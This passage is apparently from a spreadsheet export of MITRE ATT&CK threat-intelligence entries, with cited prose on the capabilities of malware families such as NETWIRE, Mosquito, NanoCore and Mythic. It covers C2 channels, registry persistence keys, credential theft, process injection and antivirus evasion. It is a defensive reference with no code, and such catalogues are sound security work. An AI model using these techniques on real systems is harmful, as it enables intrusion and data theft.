    <t>[More_eggs](https://attack.mitre.org/software/S0284) has the capability to gather the username from the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) uses HTTPS for C2.(Citation: Talos Cobalt Group July 2018)(Citation: Security Intelligence More Eggs Aug 2019)</t>
  </si>
  <si>
    <t>[More_eggs](https://attack.mitre.org/software/S0284) has used cmd.exe for execution.(Citation: Security Intelligence More Eggs Aug 2019)(Citation: ESET EvilNum July 2020)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use DNS tunneling to communicate with C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can resolve networking APIs from strings that are ADD-encrypted.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can delete its DLL file and related files by Registry value.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) has obfuscated the FML.dll with 200MB of junk data.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can write data to `HKLM\Software\NFC\IPA` and `HKLM\Software\NFC\` and delete Registry values.(Citation: DHS CISA AA22-055A MuddyWater February 2022)(Citation: CYBERCOM Iranian Intel Cyber January 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can read data from the Registry including from `HKLM\Software\NFC\IPA` and
`HKLM\Software\NFC\`.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use `regsvr32.exe` for DLL execution.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can use Base64 encoded JSON libraries used in C2.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mori](https://attack.mitre.org/software/S1047) can communicate using HTTP over IPv4 or IPv6 depending on a flag set.(Citation: DHS CISA AA22-055A MuddyWater February 2022)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses COM hijacking as a method of persistence.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) deletes files using DeleteFileW API call.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can upload and download files to the victim.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) stores configuration values under the Registry key &lt;code&gt;HKCU\Software\Microsoft\[dllname]&lt;/code&gt; and modifies Registry keys under &lt;code&gt;HKCR\CLSID\...\InprocServer32&lt;/code&gt;with a path to the launcher.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) leverages the CreateProcess() and LoadLibrary() calls to execute files with the .dll and .exe extensions.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)’s installer is obfuscated with a custom crypter to obfuscate the installer.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) can launch PowerShell Scripts.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;tasklist&lt;/code&gt; to obtain running processes.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) establishes persistence under the Registry key &lt;code&gt;HKCU\Software\Run auto_update&lt;/code&gt;.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s launcher uses rundll32.exe in a Registry Key value to start the main backdoor capability.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer searches the Registry and system to see if specific antivirus tools are installed on the system.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses a custom encryption algorithm, which consists of XOR and a stream that is similar to the Blum Blum Shub algorithm.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) uses the &lt;code&gt;ipconfig&lt;/code&gt; command.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) runs &lt;code&gt;whoami&lt;/code&gt; on the victim’s machine.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256) executes cmd.exe and uses a pipe to read the results and send back the output to the C2 server.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t>[Mosquito](https://attack.mitre.org/software/S0256)'s installer uses WMI to search for antivirus display names.(Citation: ESET Turla Mosquito Jan 2018)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports SSL encrypted C2.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports scripting of file downloads from agents.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports DNS-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) provides various transform functions to encode and/or randomize C2 data.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports custom chunk sizes used to upload/download files.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports domain fronting via custom request headers.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>[Mythic](https://attack.mitre.org/software/S0699) can leverage a modified SOCKS5 proxy to tunnel egress C2 traffic.(Citation: Mythc Documentation)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) can use a list of C2 URLs as fallback mechanisms in case one IP or domain gets blocked.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports SMB-based peer-to-peer C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) can leverage a peer-to-peer C2 profile between agents.(Citation: Mythc Documentation)		</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports WebSocket and TCP-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>[Mythic](https://attack.mitre.org/software/S0699) can use SOCKS proxies to tunnel traffic through another protocol.(Citation: Mythc Documentation)</t>
  </si>
  <si>
    <t xml:space="preserve">[Mythic](https://attack.mitre.org/software/S0699) supports HTTP-based C2 profiles.(Citation: Mythc Documentation)	</t>
  </si>
  <si>
    <t>[NBTscan](https://attack.mitre.org/software/S0590) can be used to scan IP networks.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can dump and print whole packet content.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can list NetBIOS computer names.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can be used to collect MAC addresses.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t xml:space="preserve">[NBTscan](https://attack.mitre.org/software/S0590) can list active users on the system.(Citation: Debian nbtscan Nov 2019)(Citation: SecTools nbtscan June 2003)	</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can obtain a list of all files and directories as well as logical drives.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) can download and execute a file from given URL.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) uses AES to encrypt certain information sent over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim computer name and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>[NDiskMonitor](https://attack.mitre.org/software/S0272) obtains the victim username and encrypts the information to send over its C2 channel.(Citation: TrendMicro Patchwork Dec 2017)</t>
  </si>
  <si>
    <t>Adversaries can also use [NETEAGLE](https://attack.mitre.org/software/S0034) to establish an RDP connection with a controller over TCP/7519.</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can use HTTP to download resources that contain an IP address and port number pair to connect to for C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) is capable of reading files over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request; otherwise it will send beacons via UDP/6000.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to enumerate and modify the infected host's file system. It supports searching for directories, creating directories, listing directory contents, reading and writing to files, retrieving file attributes, and retrieving volume information.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>If [NETEAGLE](https://attack.mitre.org/software/S0034) does not detect a proxy configured on the infected machine, it will send beacons via UDP/6000. Also, after retrieving a C2 IP address and Port Number, [NETEAGLE](https://attack.mitre.org/software/S0034) will initiate a TCP connection to this socket. The ensuing connection is a plaintext C2 channel in which commands are specified by DWORDs.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) can send process listings over the C2 channel.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>The "SCOUT" variant of [NETEAGLE](https://attack.mitre.org/software/S0034) achieves persistence by adding itself to the &lt;code&gt;HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt; Registry key.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will decrypt resources it downloads with HTTP requests by using RC4 with the key "ScoutEagle."(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) will attempt to detect if the infected host is configured to a proxy. If so, [NETEAGLE](https://attack.mitre.org/software/S0034) will send beacons via an HTTP POST request. [NETEAGLE](https://attack.mitre.org/software/S0034) will also use HTTP to download resources that contain an IP address and Port Number pair to connect to for further C2.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETEAGLE](https://attack.mitre.org/software/S0034) allows adversaries to execute shell commands on the infected host.(Citation: FireEye APT30)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and close windows on controlled systems.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to compress archived screenshots.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom encryption algorithm to encrypt collected data.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can automatically archive collected data.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can retrieve passwords from messaging and mail client applications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to steal credentials from web browsers including Internet Explorer, Opera, Yandex, and Chrome.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use crontabs to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can encrypt C2 communications.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to search for files on the compromised host.(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can copy itself to and launch itself from hidden folders.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can downloaded payloads from C2 to the compromised host.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) client has been signed by fake and invalid digital certificates.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can perform keylogging.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye APT33 Webinar Sept 2017)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use launch agents for persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to write collected data to a file created in the &lt;code&gt;./LOGS&lt;/code&gt; directory.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can persist via startup options for Login items.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through luring victims into opening malicious documents.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through convincing victims into clicking malicious links.(Citation: FireEye NETWIRE March 2019)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has masqueraded as legitimate software including TeamViewer and macOS Finder.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) stores its configuration file within the Registry.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use Native API including &lt;code&gt;CreateProcess&lt;/code&gt; &lt;code&gt;GetProcessById&lt;/code&gt;, and &lt;code&gt;WriteProcessMemory&lt;/code&gt;.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use TCP in C2 communications.(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used a custom obfuscation algorithm to hide strings including Registry keys, APIs, and DLL names.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) binary has been executed via PowerShell script.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover processes on compromised hosts.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>The [NETWIRE](https://attack.mitre.org/software/S0198) payload has been injected into benign Microsoft executables via process hollowing.(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can inject code into system processes including notepad.exe, svchost.exe, and vbc.exe.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can implement use of proxies to pivot traffic.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) creates a Registry start-up entry to establish persistence.(Citation: McAfee Netwire Mar 2015)(Citation: Red Canary NETWIRE January 2020)(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can create a scheduled task to establish persistence.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture the victim's screen.(Citation: McAfee Netwire Mar 2015)(Citation: FireEye NETWIRE March 2019)(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used .NET packer tools to evade detection.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious attachments.(Citation: Unit 42 NETWIRE April 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been spread via e-mail campaigns utilizing malicious links.(Citation: Unit 42 NETWIRE April 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use AES encryption for C2 data transferred.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can discover and collect victim system information.(Citation: McAfee Netwire Mar 2015)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can collect the IP address of a compromised host.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can capture session logon details from a compromised host.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to use &lt;code&gt;/bin/bash&lt;/code&gt; and &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through use of VBScripts.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has the ability to communicate over HTTP.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) has used web services including Paste.ee to host payloads.(Citation: FireEye NETWIRE March 2019)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can issue commands using cmd.exe.(Citation: Red Canary NETWIRE January 2020)(Citation: Proofpoint NETWIRE December 2020)</t>
  </si>
  <si>
    <t>[NETWIRE](https://attack.mitre.org/software/S0198) can use XDG Autostart Entries to establish persistence.(Citation: Red Canary NETWIRE January 2020)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses the Windows call SetWindowsHookEx and begins injecting it into every GUI process running on the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses a unique, custom de-obfuscation technique.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can delete files to cover tracks.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used FTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has downloaded a remote module for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect data from the victim and stage it in &lt;code&gt;LOCALAPPDATA%\MicroSoft Updatea\uplog.tmp&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) is written to %LOCALAPPDATA%\MicroSoft Updatea\svServiceUpdate.exe prior being executed in a new process in an apparent attempt to masquerade as a legitimate folder and file.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) uses Base64 encoding for strings.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has established persistence by writing the payload to the Registry key &lt;code&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/code&gt;.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used rundll32 for execution.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on drives and the operating system on the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can gather information on the victim IP address.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the username from the victim’s machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) can collect the current timestamp of the victim's machine.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[NOKKI](https://attack.mitre.org/software/S0353) has used HTTP for C2 communications.(Citation: Unit 42 NOKKI Sept 2018)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates Registry entries that store information about a created service and point to a malicious DLL dropped to disk.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects a unique identifier (UID) from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) collects the domain name from a compromised host.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[Naid](https://attack.mitre.org/software/S0205) creates a new service to establish.(Citation: Symantec Naid June 2012)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses DNS for the C2 communications.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can change Internet Explorer settings to reduce warnings about malware activity.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) launches a script to delete their original decoy file to cover tracks.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can download additional files from URLs.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional Jscript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) uses mshta.exe to load its program and files.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) encodes files in Base64.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) modifies the %regrun% Registry to point itself to an autostart mechanism.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather the victim computer name and serial number.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) can gather information about the victim proxy server.(Citation: Proofpoint Leviathan Oct 2017)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) collects the username from the victim.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional VBScript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can capture audio feeds from the system.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's firewall.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can modify the victim's anti-virus.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to download and activate additional modules for execution.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can perform keylogging on the victim’s machine.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) has the capability to edit the Registry.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336)’s plugins were obfuscated with Eazfuscater.NET 3.3.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) creates a RunOnce key in the Registry to execute its VBS scripts each time the user logs on to the machine.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses DES to encrypt the C2 traffic.(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) gathers the IP address from the victim’s machine.(Citation: DigiTrust NanoCore Jan 2017)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can access the victim's webcam and capture data.(Citation: DigiTrust NanoCore Jan 2017)(Citation: PaloAlto NanoCore Feb 2016)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) uses VBS files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NanoCore](https://attack.mitre.org/software/S0336) can open a remote command-line interface and execute commands.(Citation: PaloAlto NanoCore Feb 2016) [NanoCore](https://attack.mitre.org/software/S0336) uses JavaScript files.(Citation: Cofense NanoCore Mar 2018)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) can decrypt and decode embedded  [Cobalt Strike](https://attack.mitre.org/software/S0154) beacon stage shellcode.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) can check for the presence of KM.EkeyAlmaz1C.dll and will halt execution unless it is in the same directory as the rest of the malware's components.(Citation: MSTIC Nobelium Toolset May 2021)(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) can display an RTF document to the user  to enable execution of  [Cobalt Strike](https://attack.mitre.org/software/S0154) stage shellcode.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has, upon execution, displayed a message box that appears to be related to a Ukrainian electronic document management system.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has used rundll32 to execute a malicious DLL.(Citation: SentinelOne NobleBaron June 2021)</t>
  </si>
  <si>
    <t>[NativeZone](https://attack.mitre.org/software/S0637) has checked if Vmware or VirtualBox VM is running on a compromised host.(Citation: MSTIC Nobelium Toolset May 2021)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) can download files remotely.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) logs the keystrokes on the targeted system.(Citation: Talos NavRAT May 2018)</t>
  </si>
  <si>
    <t>[NavRAT](https://attack.mitre.org/software/S0247) writes multiple outputs to a TMP file using the &gt;&gt; method.(Citation: Talos NavRAT May 2018)</t>
  </si>
